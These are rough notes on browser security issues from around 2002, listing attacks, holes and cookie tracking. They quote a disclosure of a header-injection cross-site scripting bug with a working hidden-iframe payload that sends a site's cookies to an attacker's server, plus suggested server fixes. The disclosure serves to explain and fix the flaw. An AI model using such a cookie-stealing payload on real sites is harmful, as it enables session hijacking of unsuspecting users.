Browser Security Issues

#### Attacks

o javascript with newline embedded in link

o COM

link to a page that has an iframe with a get or post in it that ships your cookies

#### Holes

o Passport allowed user to specify the email address of where to send passwd for an account.

o javascript: can ask for cookies; see above

#### Tracking

o cookies from foreign site; can track you across sites. popups

-------------
show a typical root server report with scans etc...
------------
October 2002
<<
<code>
<iframe src="http://www.jguru.com/forums/view.jsp?EID=1009552%0a%0a<script>window.location='http://my.server/getCookie.jsp?cook=document.cookie';</script>" style="display:none;"></iframe
</code>
>>

what will happend is that when u will surf in my web page (or open an email with html attchment...),
using this cross domain scripting ill be able to steal your jguru cookie and basicly surfe as you...
this is way its a very very important issue...

so whats the problem?
the server cannot find the URI so he will return a "404" code with requested URI inside.
BUT look at the URI -> .../view.jsp?EID=1009552%0a%0a<script>..
the %0a in unicode is LF (ENTER...) so wehn tring to return the  URI without filtering the LF code will move the code
from the header section to the body section causing the browser to execute the code.

the error is in the server (not filtering out the LF...).

what you can do?
1. The best thing is to upgrade your server (if there is one).
2. If not try to rewrite the response headers before you flush them out - filter the LF...
3. You can tell the server to return "404" response witout the URI? 
   I dont know the resin server so i cant help you withthat but try doing the first 2 things.